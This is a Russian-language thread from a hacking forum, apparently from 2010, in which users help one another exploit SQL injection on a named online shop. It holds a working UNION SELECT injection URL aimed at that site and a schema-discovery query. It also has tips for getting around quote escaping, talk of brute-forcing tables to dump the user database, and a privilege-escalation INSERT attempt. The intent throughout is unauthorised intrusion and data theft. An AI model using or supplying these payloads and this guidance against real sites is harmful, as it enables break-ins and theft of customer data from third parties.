 |
|
18.01.2010, 04:21
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9541076
Репутация:
82
|
|
Ошибка в типах. Это не инъекция
|
|
|
18.01.2010, 13:41
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от v1d0qz
union select 1,2,database(),4,5
3 - выводимая колонка.
При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица. Делается это так:
Код:
SELECT table_schema FROM information_schema.tables WHERE table_name = 'твоя_таблица'
Если кавычки экранируются, переводи либо в HEX либо в CHAR.
|
|
|
|
18.01.2010, 15:34
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает
Wrong usage of UNION and ORDER BY
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''99999999, 25' at line 1
?
Спасибо.
Последний раз редактировалось mff; 18.01.2010 в 16:03..
|
|
|
|
18.01.2010, 16:12
|
|
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
С нами:
11114426
Репутация:
129
|
|
Сообщение от mff
Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает ?
Спасибо.
Да это sql-injection в SQL операторе LIMIT
|
|
|
|
18.01.2010, 16:23
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
С нами:
8593628
Репутация:
18
|
|
для mff:
http://www.etiket-shop.ru/pages.php?Page=65&nID=-132'+union+select+1,2,3,@@version,5--+
Последний раз редактировалось Alf0x0ns; 18.01.2010 в 16:25..
|
|
|
|
18.01.2010, 17:15
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Сообщение от mff
Здравствуйте.
Подскажите, есть ли тут скуль - http://www.etiket-shop.ru/catalog.php?Razdel='999999
М что означает ?
Спасибо.
Limit стоит после order by. Потому если file_priv N, то ничего не сделаешь. Второй вариант, как уже описали выше, найти другую скулю 
Сообщение от mailbrush
При таком запросе ты узнаешь текущую версию БД, а челу надо узнать БД, в которой находится таблица.
что-то я обкурился
|
|
|
|
18.01.2010, 17:51
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Спасибо ребят! Как бы теперь узнать табличку в юзерами? Нужно базу потянуть |
|
|
|
18.01.2010, 17:53
|
|
Новичок
Регистрация: 12.01.2010
Сообщений: 13
С нами:
8593628
Репутация:
18
|
|
версия Mysql ниже 5, а точней 4.0.26-log
Вариант перебор таблиц и полей!
|
|
|
|
18.01.2010, 17:55
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Alf0x0ns, ага, уже перебирал. Может кто словариком задобрит?
|
|
|
|
19.01.2010, 14:26
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Как повысить привилегии юзера в бд?
Например, есть юзер с ником user, PRIVILEGE_TYPE: USAGE.
Как добавить привилегии, пробивал через инсерт:
Код:
INSERT INTO 'USER_PRIVILEGES' VALUES('tracker'@'localhost',null,UPDATE,YES);
Подскажите где ошибка в синтаксисе?
спасибо v1d0qz.
Последний раз редактировалось wkar; 19.01.2010 в 21:06..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [NiGHT]DarkAngel](/avatars/avatar15948.jpg?1837232){kind=avatar}
Похожие темы
Линейный вид
